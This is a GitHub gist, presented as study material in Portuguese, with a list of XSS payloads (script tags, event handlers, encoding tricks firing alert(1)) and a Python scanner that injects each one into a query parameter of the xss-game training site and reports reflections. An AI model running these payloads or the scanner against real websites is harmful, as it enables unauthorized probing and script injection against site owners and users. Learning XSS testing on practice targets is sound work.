Last active
March 1, 2020 01:38
-
-
Save MrCl0wnLab/d0676903e9acc3dacffa30b43f0195c8 to your computer and use it in GitHub Desktop.
Arquivo para estudo de Scan XSS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script>alert(0)</script> | |
| <script\x20type="text/javascript">javascript:alert(1);</script> | |
| <script\x3Etype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
| <script\x09type="text/javascript">javascript:alert(1);</script> | |
| <script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
| <script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Atype="text/javascript">javascript:alert(1);</script> | |
| '`"><\x3Cscript>javascript:alert(1)</script> | |
| '`"><\x00script>javascript:alert(1)</script> | |
| <img src=1 href=1 onerror="javascript:alert(1)"></img> | |
| <audio src=1 href=1 onerror="javascript:alert(1)"></audio> | |
| <video src=1 href=1 onerror="javascript:alert(1)"></video> | |
| <body src=1 href=1 onerror="javascript:alert(1)"></body> | |
| <image src=1 href=1 onerror="javascript:alert(1)"></image> | |
| <object src=1 href=1 onerror="javascript:alert(1)"></object> | |
| <script src=1 href=1 onerror="javascript:alert(1)"></script> | |
| <svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> | |
| <title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> | |
| <iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> | |
| <body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> | |
| <body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> | |
| <frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> | |
| <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> | |
| <html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> | |
| <body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> | |
| <svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> | |
| <body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> | |
| <body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> | |
| <body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> | |
| <body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> | |
| <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> | |
| <html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> | |
| <html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> | |
| <style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> | |
| <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> | |
| <body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> | |
| <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> | |
| <frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> | |
| <applet onError applet onError="javascript:javascript:alert(1)"></applet onError> | |
| <marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> | |
| <script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> | |
| <html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> | |
| <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> | |
| <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> | |
| <html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> | |
| <marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> | |
| <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> | |
| <frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> | |
| <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> | |
| <svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> | |
| <html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> | |
| <body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> | |
| <body onResize body onResize="javascript:javascript:alert(1)"></body onResize> | |
| <object onError object onError="javascript:javascript:alert(1)"></object onError> | |
| <body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> | |
| <html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> | |
| <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> | |
| <body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> | |
| <svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> | |
| <applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> | |
| <body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> | |
| <body onunload body onunload="javascript:javascript:alert(1)"></body onunload> | |
| <iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> | |
| <body onload body onload="javascript:javascript:alert(1)"></body onload> | |
| <html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> | |
| <object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> | |
| <body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> | |
| <body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> | |
| <body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> | |
| <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> | |
| <iframe src iframe src="javascript:javascript:alert(1)"></iframe src> | |
| <svg onload svg onload="javascript:javascript:alert(1)"></svg onload> | |
| <html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> | |
| <body onblur body onblur="javascript:javascript:alert(1)"></body onblur> | |
| \x3Cscript>javascript:alert(1)</script> | |
| '"`><script>/* *\x2Fjavascript:alert(1)// */</script> | |
| <script>javascript:alert(1)</script\x0D | |
| <script>javascript:alert(1)</script\x0A | |
| <script>javascript:alert(1)</script\x0B | |
| <script charset="\x22>javascript:alert(1)</script> | |
| <!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> | |
| --><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> | |
| --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> | |
| --><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> | |
| --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> | |
| `"'><img src='#\x27 onerror=javascript:alert(1)> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from urllib import request | |
| URL_TARGET = 'https://xss-game.appspot.com/level1/frame?query=' | |
| # ARQUIVO COM FONTE XSS: https://github.com/payloadbox/xss-payload-list | |
| file_payload = 'file.txt' | |
| # ABRINDO ARQUIVO DE PAYLOADS PARA INJECT NA URL | |
| data_file_inject = open(file_payload, 'rt',encoding = "utf8") | |
| data_inject = data_file_inject.readlines() | |
| # FUNCTION PARA ENVIO DE REQUEST | |
| def sendRequest(url_request): | |
| try: | |
| header_set = {'User-Agent': 'user agent teste'} | |
| connection = request.Request(url_request, headers=header_set) | |
| response = request.urlopen(connection) | |
| str_body = response.read() | |
| # str_header = response.headers | |
| # str_codeFull = response.code | |
| # str_Code = int(''.join(filter(str.isdigit, str(response.code)))) | |
| return str_body | |
| except: | |
| return False | |
| # PROCESSO DE CONCATANECAÇÃO PARA MONTAR A URL | |
| for line_inject in data_inject: | |
| # ENVIANDO REQUEST COM URL CONCATENADA | |
| url_inject = URL_TARGET + line_inject | |
| return_request_body = sendRequest(url_inject) | |
| try: | |
| # VALIDANDO SE EXISTE ALGUM RESULTADO HTML | |
| if return_request_body: | |
| # VALIDANDO SE EXISTE O PAYLOAD XSS DENTRO DO RETORNO HTML | |
| line_inject_clear = line_inject.strip() | |
| if line_inject_clear in str(return_request_body): | |
| print(f"\n[+] XSS Detected on {url_inject}") | |
| else: | |
| print("[x] Not XSS Detected") | |
| except Exception as e: | |
| print(e) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment